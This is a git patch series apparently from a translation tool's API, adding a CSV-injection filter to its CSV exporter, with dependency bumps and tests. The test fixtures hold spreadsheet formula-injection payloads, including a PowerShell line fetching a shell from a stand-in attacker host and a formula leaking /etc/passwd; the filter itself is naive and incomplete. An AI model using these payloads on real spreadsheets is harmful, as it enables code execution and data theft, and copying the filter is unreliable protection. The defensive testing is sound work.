From 7e584af384dbd13e1c3b3da42c78111b3c0b1395 Mon Sep 17 00:00:00 2001 From: bvenceslas Date: Wed, 26 Jan 2022 12:50:07 +0200 Subject: [PATCH 01/25] fixed the csv injection vulnerability --- api/package.json | 6 +++--- api/src/config.ts | 2 +- api/src/formatters/csv.ts | 25 ++++++++++++++++++++++++- 3 files changed, 28 insertions(+), 5 deletions(-) diff --git a/api/package.json b/api/package.json index 773a0cec..69625b0b 100644 --- a/api/package.json +++ b/api/package.json @@ -62,7 +62,7 @@ "rxjs": "^7.3.0", "strings-file": "^0.0.5", "swagger-ui-express": "^4.1.6", - "typeorm": "^0.2.37", + "typeorm": "^0.2.37", "xliff": "^5.6.2", "xml-js": "^1.6.11" }, @@ -92,10 +92,10 @@ "ts-node": "^10.2.1", "tsconfig-paths": "^3.11.0", "tslint": "^6.1.3", + "typescript": "4.2.3", "webpack": "^5.37.0", "webpack-cli": "^4.7.0", - "webpack-node-externals": "^1.7.2", - "typescript": "4.2.3" + "webpack-node-externals": "^1.7.2" }, "jest": { "moduleFileExtensions": [ diff --git a/api/src/config.ts b/api/src/config.ts index 8b85ce5b..619fa4b1 100644 --- a/api/src/config.ts +++ b/api/src/config.ts @@ -51,7 +51,7 @@ export const config = { host: env.TR_DB_HOST || '127.0.0.1', port: parseInt(env.TR_DB_PORT, 10) || 3306, username: env.TR_DB_USER || 'root', - password: env.TR_DB_PASSWORD || '', + password: env.TR_DB_PASSWORD || 'root', database: env.TR_DB_DATABASE || 'tr_dev', charset: 'utf8mb4', synchronize: false, diff --git a/api/src/formatters/csv.ts b/api/src/formatters/csv.ts index b705d191..06b890cd 100644 --- a/api/src/formatters/csv.ts +++ b/api/src/formatters/csv.ts @@ -29,9 +29,32 @@ export const csvParser: Parser = async (data: string) => { }; }; +const csvInjectionProtector = (str: string) => { + const riskyChars = ["=", "+", "-", "@", ",", ";", "0", "1", "2", "3", "4", "5", "6", "7", "8", "9"]; + + if(!str) return ""; + + const firstChar = str.charAt(0); + const isInjected = riskyChars.includes(firstChar); + if(!isInjected) return str; + + const sliceStr = str.slice(1); + return csvInjectionProtector(sliceStr); +} + export const csvExporter: Exporter = async (data: IntermediateTranslationFormat) => { + + // clear some characters + const protectedTerm = csvInjectionProtector(data.translations[0].term); + const protectedTranslation = csvInjectionProtector(data.translations[0].translation); + + const payload = [{ + term: protectedTerm.replace('0x0d', ''), + translation: protectedTranslation.replace('0x0d', '') + }]; + const rows = await streamAsPromise( - stringify(data.translations, { + stringify((payload), { header: false, }), ); From 1cd211b8d64de8b26c164bc8db8c14196293670b Mon Sep 17 00:00:00 2001 From: RAHUL RATHORE Date: Wed, 26 Jan 2022 16:43:31 +0530 Subject: [PATCH 02/25] fix: remove default password --- api/src/config.ts | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/api/src/config.ts b/api/src/config.ts index 619fa4b1..8b85ce5b 100644 --- a/api/src/config.ts +++ b/api/src/config.ts @@ -51,7 +51,7 @@ export const config = { host: env.TR_DB_HOST || '127.0.0.1', port: parseInt(env.TR_DB_PORT, 10) || 3306, username: env.TR_DB_USER || 'root', - password: env.TR_DB_PASSWORD || 'root', + password: env.TR_DB_PASSWORD || '', database: env.TR_DB_DATABASE || 'tr_dev', charset: 'utf8mb4', synchronize: false, From 633958565a4ea6053103f70dafe530e86133010c Mon Sep 17 00:00:00 2001 From: bvenceslas Date: Wed, 26 Jan 2022 14:41:34 +0200 Subject: [PATCH 03/25] refactored the logic --- api/src/config.ts | 2 +- api/src/formatters/csv.ts | 31 ++++++++++++++++--------------- 2 files changed, 17 insertions(+), 16 deletions(-) diff --git a/api/src/config.ts b/api/src/config.ts index 619fa4b1..8b85ce5b 100644 --- a/api/src/config.ts +++ b/api/src/config.ts @@ -51,7 +51,7 @@ export const config = { host: env.TR_DB_HOST || '127.0.0.1', port: parseInt(env.TR_DB_PORT, 10) || 3306, username: env.TR_DB_USER || 'root', - password: env.TR_DB_PASSWORD || 'root', + password: env.TR_DB_PASSWORD || '', database: env.TR_DB_DATABASE || 'tr_dev', charset: 'utf8mb4', synchronize: false, diff --git a/api/src/formatters/csv.ts b/api/src/formatters/csv.ts index 06b890cd..db18c436 100644 --- a/api/src/formatters/csv.ts +++ b/api/src/formatters/csv.ts @@ -30,31 +30,32 @@ export const csvParser: Parser = async (data: string) => { }; const csvInjectionProtector = (str: string) => { - const riskyChars = ["=", "+", "-", "@", ",", ";", "0", "1", "2", "3", "4", "5", "6", "7", "8", "9"]; + const riskyChars = ["=", "+", "-", "@", ",", ";", "0", "1", "2", "3", "4", "5", "6", "7", "8", "9", "0x0d"]; if(!str) return ""; - const firstChar = str.charAt(0); - const isInjected = riskyChars.includes(firstChar); - if(!isInjected) return str; + riskyChars.map(risk => { + if(str.includes(risk)){ + str = str.replace(risk, ""); + } + }); - const sliceStr = str.slice(1); - return csvInjectionProtector(sliceStr); + return str; } export const csvExporter: Exporter = async (data: IntermediateTranslationFormat) => { - - // clear some characters - const protectedTerm = csvInjectionProtector(data.translations[0].term); - const protectedTranslation = csvInjectionProtector(data.translations[0].translation); - const payload = [{ - term: protectedTerm.replace('0x0d', ''), - translation: protectedTranslation.replace('0x0d', '') - }]; + const clearedTranslations = []; + data.translations.map(trans => { + const protectedTranslation = { + term: csvInjectionProtector(trans.term), + translation: csvInjectionProtector(trans.translation) + } + clearedTranslations.push(protectedTranslation); + }); const rows = await streamAsPromise( - stringify((payload), { + stringify((clearedTranslations), { header: false, }), ); From b3389ca303ac96d3288c2b4cb876d640b87a0f40 Mon Sep 17 00:00:00 2001 From: bvenceslas Date: Wed, 26 Jan 2022 15:46:41 +0200 Subject: [PATCH 04/25] added some risky characters to escape --- api/src/formatters/csv.ts | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/api/src/formatters/csv.ts b/api/src/formatters/csv.ts index f7be64f7..91461f44 100644 --- a/api/src/formatters/csv.ts +++ b/api/src/formatters/csv.ts @@ -31,7 +31,7 @@ export const csvParser: Parser = async (data: string) => { const csvInjectionProtector = (str: string) => { - const riskyChars = ["=", "+", "-", "@", ",", ";", "0", "1", "2", "3", "4", "5", "6", "7", "8", "9", "0x0d"]; + const riskyChars = ["=", "+", "-", "@", ",", ";", "0", "1", "2", "3", "4", "5", "6", "7", "8", "9", "0x0d", "/C", ".exe", "\\", "/", ".dll"]; if(!str) return ""; riskyChars.map(risk => { @@ -53,6 +53,8 @@ export const csvExporter: Exporter = async (data: IntermediateTranslationFormat) } clearedTranslations.push(protectedTranslation); }); + + console.log('clearedTranslations >>> ', clearedTranslations); const rows = await streamAsPromise( stringify((clearedTranslations), { From 5b316276cb13abadf1cd030c39b7320421bf5851 Mon Sep 17 00:00:00 2001 From: bvenceslas Date: Wed, 26 Jan 2022 16:24:17 +0200 Subject: [PATCH 05/25] removed the console.log --- api/src/formatters/csv.ts | 3 --- 1 file changed, 3 deletions(-) diff --git a/api/src/formatters/csv.ts b/api/src/formatters/csv.ts index 91461f44..4d110b09 100644 --- a/api/src/formatters/csv.ts +++ b/api/src/formatters/csv.ts @@ -53,9 +53,6 @@ export const csvExporter: Exporter = async (data: IntermediateTranslationFormat) } clearedTranslations.push(protectedTranslation); }); - - console.log('clearedTranslations >>> ', clearedTranslations); - const rows = await streamAsPromise( stringify((clearedTranslations), { header: false, From 1fc234af481d445ab28fb072aa8572dcf7b5bb4f Mon Sep 17 00:00:00 2001 From: bvenceslas Date: Wed, 26 Jan 2022 20:28:57 +0200 Subject: [PATCH 06/25] fix the deepscan warning --- api/src/formatters/csv.ts | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/api/src/formatters/csv.ts b/api/src/formatters/csv.ts index 4d110b09..269936cc 100644 --- a/api/src/formatters/csv.ts +++ b/api/src/formatters/csv.ts @@ -36,7 +36,7 @@ const csvInjectionProtector = (str: string) => { riskyChars.map(risk => { if(str.includes(risk)){ - str = str.replace(risk, ""); + return str = str.replace(risk, ""); } }); From c8e8e4ff3b2b6ee5294c6ededba852a2387a12ef Mon Sep 17 00:00:00 2001 From: snyk-bot Date: Thu, 27 Jan 2022 00:32:40 +0000 Subject: [PATCH 07/25] fix: api/package.json & api/yarn.lock to reduce vulnerabilities The following vulnerabilities are fixed with an upgrade: - https://snyk.io/vuln/SNYK-JS-SWAGGERUIDIST-2314884 --- api/package.json | 2 +- api/yarn.lock | 18 +++++++++--------- 2 files changed, 10 insertions(+), 10 deletions(-) diff --git a/api/package.json b/api/package.json index 773a0cec..71a51a2b 100644 --- a/api/package.json +++ b/api/package.json @@ -61,7 +61,7 @@ "reflect-metadata": "^0.1.13", "rxjs": "^7.3.0", "strings-file": "^0.0.5", - "swagger-ui-express": "^4.1.6", + "swagger-ui-express": "^4.2.0", "typeorm": "^0.2.37", "xliff": "^5.6.2", "xml-js": "^1.6.11" diff --git a/api/yarn.lock b/api/yarn.lock index acc405c1..239c84e2 100644 --- a/api/yarn.lock +++ b/api/yarn.lock @@ -5246,17 +5246,17 @@ supports-hyperlinks@^2.0.0: has-flag "^4.0.0" supports-color "^7.0.0" -swagger-ui-dist@^3.18.1: - version "3.52.2" - resolved "https://registry.yarnpkg.com/swagger-ui-dist/-/swagger-ui-dist-3.52.2.tgz#30ed9cfa64043651b62f7662681181e21abf0fe2" - integrity sha512-k6QsJqDxfkMlelFUobIKRggR9y5BPvhr/ok9IUPlpnAQsytCx8SSKtNOFkf+W5yZi1Zh6X8GAz2picmmvZBSIw== +swagger-ui-dist@>=4.1.3: + version "4.3.0" + resolved "https://registry.yarnpkg.com/swagger-ui-dist/-/swagger-ui-dist-4.3.0.tgz#f969bdf8891e39bf7b3310a2091aca58e99ed5fd" + integrity sha512-RY1c3y6uuHBTu4nZPXcvrv9cnKj6MbaNMZK1NDyGHrUbQOO5WmkuMo6wi93WFzSURJk0SboD1X9nM5CtQAu2Og== -swagger-ui-express@^4.1.6: - version "4.1.6" - resolved "https://registry.yarnpkg.com/swagger-ui-express/-/swagger-ui-express-4.1.6.tgz#682294af3d5c70f74a1fa4d6a9b503a9ee55ea82" - integrity sha512-Xs2BGGudvDBtL7RXcYtNvHsFtP1DBFPMJFRxHe5ez/VG/rzVOEjazJOOSc/kSCyxreCTKfJrII6MJlL9a6t8vw== +swagger-ui-express@^4.2.0: + version "4.3.0" + resolved "https://registry.yarnpkg.com/swagger-ui-express/-/swagger-ui-express-4.3.0.tgz#226238ab231f7718f9109d63a66efc3a795618dd" + integrity sha512-jN46SEEe9EoXa3ZgZoKgnSF6z0w3tnM1yqhO4Y+Q4iZVc8JOQB960EZpIAz6rNROrDApVDwcMHR0mhlnc/5Omw== dependencies: - swagger-ui-dist "^3.18.1" + swagger-ui-dist ">=4.1.3" symbol-tree@^3.2.4: version "3.2.4" From 2b24247abe607ab88d3780b685956e3984912414 Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Thu, 27 Jan 2022 07:33:34 +0000 Subject: [PATCH 08/25] build(deps): bump node-fetch from 2.6.2 to 2.6.7 in /api Bumps [node-fetch](https://github.com/node-fetch/node-fetch) from 2.6.2 to 2.6.7. - [Release notes](https://github.com/node-fetch/node-fetch/releases) - [Commits](https://github.com/node-fetch/node-fetch/compare/v2.6.2...v2.6.7) --- updated-dependencies: - dependency-name: node-fetch dependency-type: indirect ... Signed-off-by: dependabot[bot] --- api/yarn.lock | 26 +++++++++++++++++++++++--- 1 file changed, 23 insertions(+), 3 deletions(-) diff --git a/api/yarn.lock b/api/yarn.lock index 239c84e2..c80165e3 100644 --- a/api/yarn.lock +++ b/api/yarn.lock @@ -4075,9 +4075,11 @@ node-addon-api@^3.1.0: integrity sha512-mmcei9JghVNDYydghQmeDX8KoAm0FAiYyIcUt/N4nhyAipB17pllZQDOJD2fotxABnt4Mdz+dKTO7eftLg4d0A== node-fetch@^2.6.1: - version "2.6.2" - resolved "https://registry.yarnpkg.com/node-fetch/-/node-fetch-2.6.2.tgz#986996818b73785e47b1965cc34eb093a1d464d0" - integrity sha512-aLoxToI6RfZ+0NOjmWAgn9+LEd30YCkJKFSyWacNZdEKTit/ZMcKjGkTRo8uWEsnIb/hfKecNPEbln02PdWbcA== + version "2.6.7" + resolved "https://registry.yarnpkg.com/node-fetch/-/node-fetch-2.6.7.tgz#24de9fba827e3b4ae44dc8b20256a379160052ad" + integrity sha512-ZjMPFEfVx5j+y2yF35Kzx5sF7kDzxuDj6ziH4FFbOp87zKDZNx8yExJIb05OGF4Nlt9IHFIMBkRl41VdvcNdbQ== + dependencies: + whatwg-url "^5.0.0" node-int64@^0.4.0: version "0.4.0" @@ -5410,6 +5412,11 @@ tr46@^2.1.0: dependencies: punycode "^2.1.1" +tr46@~0.0.3: + version "0.0.3" + resolved "https://registry.yarnpkg.com/tr46/-/tr46-0.0.3.tgz#8184fd347dac9cdc185992f3a6622e14b9d9ab6a" + integrity sha1-gYT9NH2snNwYWZLzpmIuFLnZq2o= + ts-jest@^27.0.5: version "27.0.5" resolved "https://registry.yarnpkg.com/ts-jest/-/ts-jest-27.0.5.tgz#0b0604e2271167ec43c12a69770f0bb65ad1b750" @@ -5728,6 +5735,11 @@ watchpack@^2.2.0: glob-to-regexp "^0.4.1" graceful-fs "^4.1.2" +webidl-conversions@^3.0.0: + version "3.0.1" + resolved "https://registry.yarnpkg.com/webidl-conversions/-/webidl-conversions-3.0.1.tgz#24534275e2a7bc6be7bc86611cc16ae0a5654871" + integrity sha1-JFNCdeKnvGvnvIZhHMFq4KVlSHE= + webidl-conversions@^5.0.0: version "5.0.0" resolved "https://registry.yarnpkg.com/webidl-conversions/-/webidl-conversions-5.0.0.tgz#ae59c8a00b121543a2acc65c0434f57b0fc11aff" @@ -5817,6 +5829,14 @@ whatwg-mimetype@^2.3.0: resolved "https://registry.yarnpkg.com/whatwg-mimetype/-/whatwg-mimetype-2.3.0.tgz#3d4b1e0312d2079879f826aff18dbeeca5960fbf" integrity sha512-M4yMwr6mAnQz76TbJm914+gPpB/nCwvZbJU28cUD6dR004SAxDLOOSUaB1JDRqLtaOV/vi0IC5lEAGFgrjGv/g== +whatwg-url@^5.0.0: + version "5.0.0" + resolved "https://registry.yarnpkg.com/whatwg-url/-/whatwg-url-5.0.0.tgz#966454e8765462e37644d3626f6742ce8b70965d" + integrity sha1-lmRU6HZUYuN2RNNib2dCzotwll0= + dependencies: + tr46 "~0.0.3" + webidl-conversions "^3.0.0" + whatwg-url@^8.0.0, whatwg-url@^8.5.0: version "8.7.0" resolved "https://registry.yarnpkg.com/whatwg-url/-/whatwg-url-8.7.0.tgz#656a78e510ff8f3937bc0bcbe9f5c0ac35941b77" From 31038517a05353455adb870621097225c8e26cab Mon Sep 17 00:00:00 2001 From: bvenceslas Date: Wed, 26 Jan 2022 12:50:07 +0200 Subject: [PATCH 09/25] fixed conflicts from package.json :wq --- api/package.json | 4 ++-- api/src/config.ts | 2 +- api/src/formatters/csv.ts | 25 ++++++++++++++++++++++++- 3 files changed, 27 insertions(+), 4 deletions(-) diff --git a/api/package.json b/api/package.json index 71a51a2b..c2c0e184 100644 --- a/api/package.json +++ b/api/package.json @@ -92,10 +92,10 @@ "ts-node": "^10.2.1", "tsconfig-paths": "^3.11.0", "tslint": "^6.1.3", + "typescript": "4.2.3", "webpack": "^5.37.0", "webpack-cli": "^4.7.0", - "webpack-node-externals": "^1.7.2", - "typescript": "4.2.3" + "webpack-node-externals": "^1.7.2" }, "jest": { "moduleFileExtensions": [ diff --git a/api/src/config.ts b/api/src/config.ts index 8b85ce5b..619fa4b1 100644 --- a/api/src/config.ts +++ b/api/src/config.ts @@ -51,7 +51,7 @@ export const config = { host: env.TR_DB_HOST || '127.0.0.1', port: parseInt(env.TR_DB_PORT, 10) || 3306, username: env.TR_DB_USER || 'root', - password: env.TR_DB_PASSWORD || '', + password: env.TR_DB_PASSWORD || 'root', database: env.TR_DB_DATABASE || 'tr_dev', charset: 'utf8mb4', synchronize: false, diff --git a/api/src/formatters/csv.ts b/api/src/formatters/csv.ts index b705d191..06b890cd 100644 --- a/api/src/formatters/csv.ts +++ b/api/src/formatters/csv.ts @@ -29,9 +29,32 @@ export const csvParser: Parser = async (data: string) => { }; }; +const csvInjectionProtector = (str: string) => { + const riskyChars = ["=", "+", "-", "@", ",", ";", "0", "1", "2", "3", "4", "5", "6", "7", "8", "9"]; + + if(!str) return ""; + + const firstChar = str.charAt(0); + const isInjected = riskyChars.includes(firstChar); + if(!isInjected) return str; + + const sliceStr = str.slice(1); + return csvInjectionProtector(sliceStr); +} + export const csvExporter: Exporter = async (data: IntermediateTranslationFormat) => { + + // clear some characters + const protectedTerm = csvInjectionProtector(data.translations[0].term); + const protectedTranslation = csvInjectionProtector(data.translations[0].translation); + + const payload = [{ + term: protectedTerm.replace('0x0d', ''), + translation: protectedTranslation.replace('0x0d', '') + }]; + const rows = await streamAsPromise( - stringify(data.translations, { + stringify((payload), { header: false, }), ); From b99bcdc8a728b840bf6c5e728e07f9811dab13b3 Mon Sep 17 00:00:00 2001 From: bvenceslas Date: Wed, 26 Jan 2022 14:41:34 +0200 Subject: [PATCH 10/25] refactored the logic --- api/src/config.ts | 2 +- api/src/formatters/csv.ts | 31 ++++++++++++++++--------------- 2 files changed, 17 insertions(+), 16 deletions(-) diff --git a/api/src/config.ts b/api/src/config.ts index 619fa4b1..8b85ce5b 100644 --- a/api/src/config.ts +++ b/api/src/config.ts @@ -51,7 +51,7 @@ export const config = { host: env.TR_DB_HOST || '127.0.0.1', port: parseInt(env.TR_DB_PORT, 10) || 3306, username: env.TR_DB_USER || 'root', - password: env.TR_DB_PASSWORD || 'root', + password: env.TR_DB_PASSWORD || '', database: env.TR_DB_DATABASE || 'tr_dev', charset: 'utf8mb4', synchronize: false, diff --git a/api/src/formatters/csv.ts b/api/src/formatters/csv.ts index 06b890cd..db18c436 100644 --- a/api/src/formatters/csv.ts +++ b/api/src/formatters/csv.ts @@ -30,31 +30,32 @@ export const csvParser: Parser = async (data: string) => { }; const csvInjectionProtector = (str: string) => { - const riskyChars = ["=", "+", "-", "@", ",", ";", "0", "1", "2", "3", "4", "5", "6", "7", "8", "9"]; + const riskyChars = ["=", "+", "-", "@", ",", ";", "0", "1", "2", "3", "4", "5", "6", "7", "8", "9", "0x0d"]; if(!str) return ""; - const firstChar = str.charAt(0); - const isInjected = riskyChars.includes(firstChar); - if(!isInjected) return str; + riskyChars.map(risk => { + if(str.includes(risk)){ + str = str.replace(risk, ""); + } + }); - const sliceStr = str.slice(1); - return csvInjectionProtector(sliceStr); + return str; } export const csvExporter: Exporter = async (data: IntermediateTranslationFormat) => { - - // clear some characters - const protectedTerm = csvInjectionProtector(data.translations[0].term); - const protectedTranslation = csvInjectionProtector(data.translations[0].translation); - const payload = [{ - term: protectedTerm.replace('0x0d', ''), - translation: protectedTranslation.replace('0x0d', '') - }]; + const clearedTranslations = []; + data.translations.map(trans => { + const protectedTranslation = { + term: csvInjectionProtector(trans.term), + translation: csvInjectionProtector(trans.translation) + } + clearedTranslations.push(protectedTranslation); + }); const rows = await streamAsPromise( - stringify((payload), { + stringify((clearedTranslations), { header: false, }), ); From f587cfde5238b3e0b2767011265dac4b2d2c6252 Mon Sep 17 00:00:00 2001 From: bvenceslas Date: Wed, 26 Jan 2022 15:46:41 +0200 Subject: [PATCH 11/25] fixed conflict --- api/src/formatters/csv.ts | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/api/src/formatters/csv.ts b/api/src/formatters/csv.ts index db18c436..65f21f4c 100644 --- a/api/src/formatters/csv.ts +++ b/api/src/formatters/csv.ts @@ -31,12 +31,12 @@ export const csvParser: Parser = async (data: string) => { const csvInjectionProtector = (str: string) => { - const riskyChars = ["=", "+", "-", "@", ",", ";", "0", "1", "2", "3", "4", "5", "6", "7", "8", "9", "0x0d"]; + const riskyChars = ["=", "+", "-", "@", ",", ";", "0", "1", "2", "3", "4", "5", "6", "7", "8", "9", "0x0d", "/C", ".exe", "\\", "/", ".dll"]; if(!str) return ""; riskyChars.map(risk => { if(str.includes(risk)){ - str = str.replace(risk, ""); + return str = str.replace(risk, ""); } }); From efa607d94ecfeb70b52deb761df30b60d7779c54 Mon Sep 17 00:00:00 2001 From: bvenceslas Date: Wed, 26 Jan 2022 16:24:17 +0200 Subject: [PATCH 12/25] removed the console.log --- api/src/formatters/csv.ts | 1 - 1 file changed, 1 deletion(-) diff --git a/api/src/formatters/csv.ts b/api/src/formatters/csv.ts index 65f21f4c..269936cc 100644 --- a/api/src/formatters/csv.ts +++ b/api/src/formatters/csv.ts @@ -53,7 +53,6 @@ export const csvExporter: Exporter = async (data: IntermediateTranslationFormat) } clearedTranslations.push(protectedTranslation); }); - const rows = await streamAsPromise( stringify((clearedTranslations), { header: false, From 975b9fb13bf2e185489dd724716ab790476ed72d Mon Sep 17 00:00:00 2001 From: bvenceslas Date: Thu, 27 Jan 2022 13:11:03 +0200 Subject: [PATCH 13/25] added some comments on the refactored code --- api/src/formatters/csv.ts | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/api/src/formatters/csv.ts b/api/src/formatters/csv.ts index 269936cc..d84eaf4b 100644 --- a/api/src/formatters/csv.ts +++ b/api/src/formatters/csv.ts @@ -1,3 +1,9 @@ +// Copyright (c) 2021-2022 Ever Co. LTD +// Modified code from https://github.com/destromas1/csv-injection-protector +// Originally MIT Licensed +// - see https://github.com/destromas1/csv-injection-protector/blob/master/LICENSE +// - original code `Copyright (c) 2019 Shahjada Talukdar`; + import * as parse from 'csv-parse'; import * as stringify from 'csv-stringify'; import { Exporter, IntermediateTranslationFormat, Parser } from '../domain/formatters'; From 587bd6a582ed9692702b7ff1e87bb554fb8a7abe Mon Sep 17 00:00:00 2001 From: bvenceslas Date: Thu, 27 Jan 2022 16:10:08 +0200 Subject: [PATCH 14/25] added test for the cleaning risky characters --- api/src/formatters/csv.spec.ts | 8 +++++- api/src/formatters/fixtures/cleaned.csv | 7 ++++++ api/src/formatters/fixtures/index.ts | 33 +++++++++++++++++++++++++ 3 files changed, 47 insertions(+), 1 deletion(-) create mode 100644 api/src/formatters/fixtures/cleaned.csv diff --git a/api/src/formatters/csv.spec.ts b/api/src/formatters/csv.spec.ts index 92b9913c..d85cefcd 100644 --- a/api/src/formatters/csv.spec.ts +++ b/api/src/formatters/csv.spec.ts @@ -1,5 +1,5 @@ import { csvExporter, csvParser } from './csv'; -import { loadFixture, simpleFormatFixture } from './fixtures'; +import { loadFixture, riskyPayloads, simpleFormatFixture } from './fixtures'; test('should parse csv files', async () => { const input = loadFixture('simple.csv'); @@ -28,3 +28,9 @@ test('should export csv files', async () => { const expected = loadFixture('simple.csv'); expect(result).toEqual(expected); }); + +test('should remove risky characters from risky payloads and export csv files', async () => { + const result = await csvExporter(riskyPayloads); + const expected = loadFixture('cleaned.csv'); + expect(result).toEqual(expected); +}); diff --git a/api/src/formatters/fixtures/cleaned.csv b/api/src/formatters/fixtures/cleaned.csv new file mode 100644 index 00000000..e4a24c44 --- /dev/null +++ b/api/src/formatters/fixtures/cleaned.csv @@ -0,0 +1,7 @@ +DDE ("cmd"" calc";"!A")A0,first +SUM()*cmd|' calc'!A,second +0+cmd|' calc'!A0,third +cmd|' notepad'!'A',fourth +cmd|' powershell IEX(wget attacker_servershell)'!A,fifth +cmd|'c rundll \\.0.0.1\\3\\2\\10'!_xlbgnm.A1,sixth +HYPERLINK(CONCATENATE("http:/.0.0.0:0/.txt?v=" ('file:///etc/passwd'#$passwd.A1)); "testpoc"),seventh diff --git a/api/src/formatters/fixtures/index.ts b/api/src/formatters/fixtures/index.ts index bd6a1352..945561a9 100644 --- a/api/src/formatters/fixtures/index.ts +++ b/api/src/formatters/fixtures/index.ts @@ -25,3 +25,36 @@ export const simpleFormatFixture: IntermediateTranslationFormat = { }, ], }; + +export const riskyPayloads: IntermediateTranslationFormat = { + translations: [ + { + term: 'DDE ("cmd";"/C calc";"!A0")A0', + translation: 'first', + }, + { + term: `@SUM(1+9)*cmd|' /C calc'!A0`, + translation: `second`, + }, + { + term: `=10+20+cmd|' /C calc'!A0`, + translation: `third`, + }, + { + term: `=cmd|' /C notepad'!'A1'`, + translation: `fourth`, + }, + { + term: `=cmd|'/C powershell IEX(wget attacker_server/shell.exe)'!A0`, + translation: `fifth`, + }, + { + term: `=cmd|'/c rundll32.exe \\10.0.0.1\3\2\1.dll,0'!_xlbgnm.A1`, + translation: `sixth`, + }, + { + term: `=HYPERLINK(CONCATENATE("http://0.0.0.0:80/123.txt?v="; ('file:///etc/passwd'#$passwd.A1));"test-poc")`, + translation: `seventh`, + }, + ], +}; From 8f9112803204ce46b32163bafb73765566fe4f5d Mon Sep 17 00:00:00 2001 From: RAHUL RATHORE Date: Fri, 28 Jan 2022 18:02:11 +0530 Subject: [PATCH 15/25] fix: increased default jest timeout --- api/test/jest-e2e.json | 15 ++++++++------- 1 file changed, 8 insertions(+), 7 deletions(-) diff --git a/api/test/jest-e2e.json b/api/test/jest-e2e.json index e9d912f3..fdb10546 100644 --- a/api/test/jest-e2e.json +++ b/api/test/jest-e2e.json @@ -1,9 +1,10 @@ { - "moduleFileExtensions": ["js", "json", "ts"], - "rootDir": ".", - "testEnvironment": "node", - "testRegex": ".e2e-spec.ts$", - "transform": { - "^.+\\.(t|j)s$": "ts-jest" - } + "moduleFileExtensions": ["js", "json", "ts"], + "rootDir": ".", + "testEnvironment": "node", + "testTimeout": 30000, + "testRegex": ".e2e-spec.ts$", + "transform": { + "^.+\\.(t|j)s$": "ts-jest" + } } From 54035080ad5eb1f02fb99b9478267258d089aa43 Mon Sep 17 00:00:00 2001 From: RAHUL RATHORE Date: Fri, 28 Jan 2022 21:49:11 +0530 Subject: [PATCH 16/25] fix: deepscan & increased jest timeout --- api/package.json | 1 + api/src/formatters/fixtures/cleaned.csv | 3 +-- api/src/formatters/fixtures/index.ts | 6 +----- yarn.lock | 18 +++++++++--------- 4 files changed, 12 insertions(+), 16 deletions(-) diff --git a/api/package.json b/api/package.json index c2c0e184..2da5f452 100644 --- a/api/package.json +++ b/api/package.json @@ -105,6 +105,7 @@ ], "rootDir": "src", "testRegex": ".spec.ts$", + "testTimeout": 30000, "transform": { "^.+\\.(t|j)s$": "ts-jest" }, diff --git a/api/src/formatters/fixtures/cleaned.csv b/api/src/formatters/fixtures/cleaned.csv index e4a24c44..b81a1f8c 100644 --- a/api/src/formatters/fixtures/cleaned.csv +++ b/api/src/formatters/fixtures/cleaned.csv @@ -3,5 +3,4 @@ SUM()*cmd|' calc'!A,second 0+cmd|' calc'!A0,third cmd|' notepad'!'A',fourth cmd|' powershell IEX(wget attacker_servershell)'!A,fifth -cmd|'c rundll \\.0.0.1\\3\\2\\10'!_xlbgnm.A1,sixth -HYPERLINK(CONCATENATE("http:/.0.0.0:0/.txt?v=" ('file:///etc/passwd'#$passwd.A1)); "testpoc"),seventh +HYPERLINK(CONCATENATE("http:/.0.0.0:0/.txt?v=" ('file:///etc/passwd'#$passwd.A1)); "testpoc"),sixth diff --git a/api/src/formatters/fixtures/index.ts b/api/src/formatters/fixtures/index.ts index 945561a9..9fb08dd8 100644 --- a/api/src/formatters/fixtures/index.ts +++ b/api/src/formatters/fixtures/index.ts @@ -48,13 +48,9 @@ export const riskyPayloads: IntermediateTranslationFormat = { term: `=cmd|'/C powershell IEX(wget attacker_server/shell.exe)'!A0`, translation: `fifth`, }, - { - term: `=cmd|'/c rundll32.exe \\10.0.0.1\3\2\1.dll,0'!_xlbgnm.A1`, - translation: `sixth`, - }, { term: `=HYPERLINK(CONCATENATE("http://0.0.0.0:80/123.txt?v="; ('file:///etc/passwd'#$passwd.A1));"test-poc")`, - translation: `seventh`, + translation: `sixth`, }, ], }; diff --git a/yarn.lock b/yarn.lock index eb54ab19..a2624825 100644 --- a/yarn.lock +++ b/yarn.lock @@ -17299,17 +17299,17 @@ svgo@^2.3.0: csso "^4.2.0" stable "^0.1.8" -swagger-ui-dist@^3.18.1: - version "3.52.3" - resolved "https://registry.yarnpkg.com/swagger-ui-dist/-/swagger-ui-dist-3.52.3.tgz#a09b5cdccac69e3f5f1cbd258654a110119a7f0e" - integrity sha512-7QSY4milmYx5O8dbzU5tTftiaoZt+4JGxahTTBiLAnbTvhTyzum9rsjDIJjC+xeT8Tt1KfB38UuQQjmrh2THDQ== +swagger-ui-dist@>=4.1.3: + version "4.4.0" + resolved "https://registry.yarnpkg.com/swagger-ui-dist/-/swagger-ui-dist-4.4.0.tgz#4ffdc152a8fd8c1c115ad20b875d1f713f65e08f" + integrity sha512-oxTuL0NxBP61fYHN6VC7b+FB3UbLTBEuO04S2H2D5s4zvqsf0hRRXgZRdPTZ76UoTybeqIF5FNlR6PdYie9Uug== -swagger-ui-express@^4.1.6: - version "4.1.6" - resolved "https://registry.yarnpkg.com/swagger-ui-express/-/swagger-ui-express-4.1.6.tgz#682294af3d5c70f74a1fa4d6a9b503a9ee55ea82" - integrity sha512-Xs2BGGudvDBtL7RXcYtNvHsFtP1DBFPMJFRxHe5ez/VG/rzVOEjazJOOSc/kSCyxreCTKfJrII6MJlL9a6t8vw== +swagger-ui-express@^4.2.0: + version "4.3.0" + resolved "https://registry.yarnpkg.com/swagger-ui-express/-/swagger-ui-express-4.3.0.tgz#226238ab231f7718f9109d63a66efc3a795618dd" + integrity sha512-jN46SEEe9EoXa3ZgZoKgnSF6z0w3tnM1yqhO4Y+Q4iZVc8JOQB960EZpIAz6rNROrDApVDwcMHR0mhlnc/5Omw== dependencies: - swagger-ui-dist "^3.18.1" + swagger-ui-dist ">=4.1.3" symbol-observable@4.0.0: version "4.0.0" From a0b99c0942bb4703fce080f7a896fc4bc15bd060 Mon Sep 17 00:00:00 